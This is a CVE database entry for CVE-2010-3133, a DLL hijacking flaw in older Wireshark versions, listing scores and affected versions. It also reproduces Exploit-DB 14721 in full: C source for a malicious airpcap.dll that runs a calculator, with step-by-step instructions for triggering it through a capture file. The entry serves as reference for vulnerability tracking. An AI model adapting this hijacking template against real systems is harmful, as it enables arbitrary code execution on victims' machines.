CVE-2010-3133 : Detail

CVE-2010-3133

1.57%V3
Network
2010-08-26
16h00 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Untrusted search path vulnerability in Wireshark 0.8.4 through 1.0.15 and 1.2.0 through 1.2.10 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse airpcap.dll, and possibly other DLLs, that is located in the same folder as a file that automatically launches Wireshark.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 14721

Publication date : 2010-08-23 22h00 +00:00
Author : TheLeader
EDB Verified : Yes

/* Exploit Title: Wireshark <= 1.2.10 DLL Hijacking Exploit (airpcap.dll) Date: 24/08/2010 Author: TheLeader Email: gsog2009 [a7] hotmail [d0t] com Software Link: http://www.wireshark.org/download.html Version: 1.2.10 and prior Tested on: Windows 7 x86 (6.1.7600) As seen on Metasploit blog (rock on HDM!): http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html Probably gonna see alot of these bugs getting exploited in the near future.. Compile and rename to airpcap.dll, create a file in the same dir with one of the following extensions. Default Wireshark file extension associations: .5vw / .acp / .apc / .atc / .bfr / .cap / .enc / .erf / .fdc / .pcap / .pcapng / .pkt / .rf5 / .snoop / .syc / .tpc / .tr1 / .trace / .trc / .wpc / .wpz Double click & watch a nice calculator pop =] Shouts to all the great guys at forums.hacking.org.il */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void AirpcapGetDeviceList() { evil(); } DLLIMPORT void AirpcapFreeDeviceList() { evil(); } DLLIMPORT void AirpcapOpen() { evil(); } DLLIMPORT void AirpcapClose() { evil(); } DLLIMPORT void AirpcapGetLinkType() { evil(); } DLLIMPORT void AirpcapSetLinkType() { evil(); } DLLIMPORT void AirpcapSetKernelBuffer() { evil(); } DLLIMPORT void AirpcapSetFilter() { evil(); } DLLIMPORT void AirpcapGetMacAddress() { evil(); } DLLIMPORT void AirpcapSetMinToCopy() { evil(); } DLLIMPORT void AirpcapGetReadEvent() { evil(); } DLLIMPORT void AirpcapRead() { evil(); } DLLIMPORT void AirpcapGetStats() { evil(); } DLLIMPORT void AirpcapTurnLedOn() { evil(); } DLLIMPORT void AirpcapTurnLedOff() { evil(); } DLLIMPORT void AirpcapGetDeviceChannel() { evil(); } DLLIMPORT void AirpcapSetDeviceChannel() { evil(); } DLLIMPORT void AirpcapGetFcsPresence() { evil(); } DLLIMPORT void AirpcapSetFcsPresence() { evil(); } DLLIMPORT void AirpcapGetFcsValidation() { evil(); } DLLIMPORT void AirpcapSetFcsValidation() { evil(); } DLLIMPORT void AirpcapGetDeviceKeys() { evil(); } DLLIMPORT void AirpcapSetDeviceKeys() { evil(); } DLLIMPORT void AirpcapGetDecryptionState() { evil(); } DLLIMPORT void AirpcapSetDecryptionState() { evil(); } DLLIMPORT void AirpcapStoreCurConfigAsAdapterDefault() { evil(); } DLLIMPORT void AirpcapGetVersion() { evil(); } DLLIMPORT void AirpcapGetDriverDecryptionState() { evil(); } DLLIMPORT void AirpcapSetDriverDecryptionState() { evil(); } DLLIMPORT void AirpcapGetDriverKeys() { evil(); } DLLIMPORT void AirpcapSetDriverKeys() { evil(); } DLLIMPORT void AirpcapSetDeviceChannelEx() { evil(); } DLLIMPORT void AirpcapGetDeviceChannelEx() { evil(); } DLLIMPORT void AirpcapGetDeviceSupportedChannels() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; }

Products Mentioned

Configuraton 0

Wireshark>>Wireshark >> Version To (including) 1.2.10

Wireshark>>Wireshark >> Version 0.99.2

Wireshark>>Wireshark >> Version 0.99.3

Wireshark>>Wireshark >> Version 0.99.4

Wireshark>>Wireshark >> Version 0.99.5

Wireshark>>Wireshark >> Version 0.99.6

Wireshark>>Wireshark >> Version 0.99.7

Wireshark>>Wireshark >> Version 0.99.8

Wireshark>>Wireshark >> Version 1.0.0

Wireshark>>Wireshark >> Version 1.0.1

Wireshark>>Wireshark >> Version 1.0.2

Wireshark>>Wireshark >> Version 1.0.3

Wireshark>>Wireshark >> Version 1.0.4

Wireshark>>Wireshark >> Version 1.0.5

Wireshark>>Wireshark >> Version 1.0.6

Wireshark>>Wireshark >> Version 1.0.7

Wireshark>>Wireshark >> Version 1.0.8

Wireshark>>Wireshark >> Version 1.0.9

Wireshark>>Wireshark >> Version 1.0.10

Wireshark>>Wireshark >> Version 1.0.11

Wireshark>>Wireshark >> Version 1.0.12

Wireshark>>Wireshark >> Version 1.2.0

Wireshark>>Wireshark >> Version 1.2.1

Wireshark>>Wireshark >> Version 1.2.2

Wireshark>>Wireshark >> Version 1.2.3

Wireshark>>Wireshark >> Version 1.2.4

Wireshark>>Wireshark >> Version 1.2.5

Wireshark>>Wireshark >> Version 1.2.6

Wireshark>>Wireshark >> Version 1.2.7

Wireshark>>Wireshark >> Version 1.2.8

Wireshark>>Wireshark >> Version 1.2.9

References

http://www.exploit-db.com/exploits/14721/
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/41064
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/2165
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2010/2243
Tags : vdb-entry, x_refsource_VUPEN